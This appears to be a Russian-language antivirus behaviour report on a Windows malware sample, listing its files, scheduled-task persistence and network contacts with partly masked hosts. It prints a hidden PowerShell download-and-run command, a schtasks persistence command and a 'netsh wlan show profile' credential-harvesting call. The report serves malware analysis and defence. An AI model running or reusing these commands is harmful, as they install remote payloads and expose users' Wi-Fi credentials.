Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\updates\xlabyfygunc
Вредоносные функции
Загружает и запускает на исполнение
- http://18#.#02.170.122/trlliw.exe как %appdata%\trlliw.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C %APPDATA%\trlliw.exe
Внедряет код в
следующие пользовательские процессы:
- trlliw.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\dbdtfhgygeghdpВ .sct
- %APPDATA%\trlliw.exe
- %APPDATA%\xlabyfygunc.exe
- %TEMP%\tmpeff9.tmp
Удаляет следующие файлы
- %TEMP%\dbdtfhgygeghdpВ .sct
- %TEMP%\tmpeff9.tmp
Сетевая активность
Подключается к
- '18#.#02.170.122':80
- 'ch####p.dyndns.org':80
- 'ap#.##legram.org':443
TCP
Запросы HTTP GET
- http://18#.#02.170.122/trlliw.exe
- http://ch####p.dyndns.org/
Другие
- 'ap#.##legram.org':443
UDP
- DNS ASK ch####p.dyndns.org
- DNS ASK ap#.##legram.org
Другое
Создает и запускает на исполнение
- '%APPDATA%\trlliw.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://18#.#02.170.122/trlliw.exe','%APPDATA%\trlliw.exe')' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /C %APPDATA%\trlliw.exe' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\XLabYFYguNC" /XML "%TEMP%\tmpEFF9.tmp"' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\XLabYFYguNC" /XML "%TEMP%\tmpEFF9.tmp"
- '%WINDIR%\syswow64\netsh.exe' wlan show profile
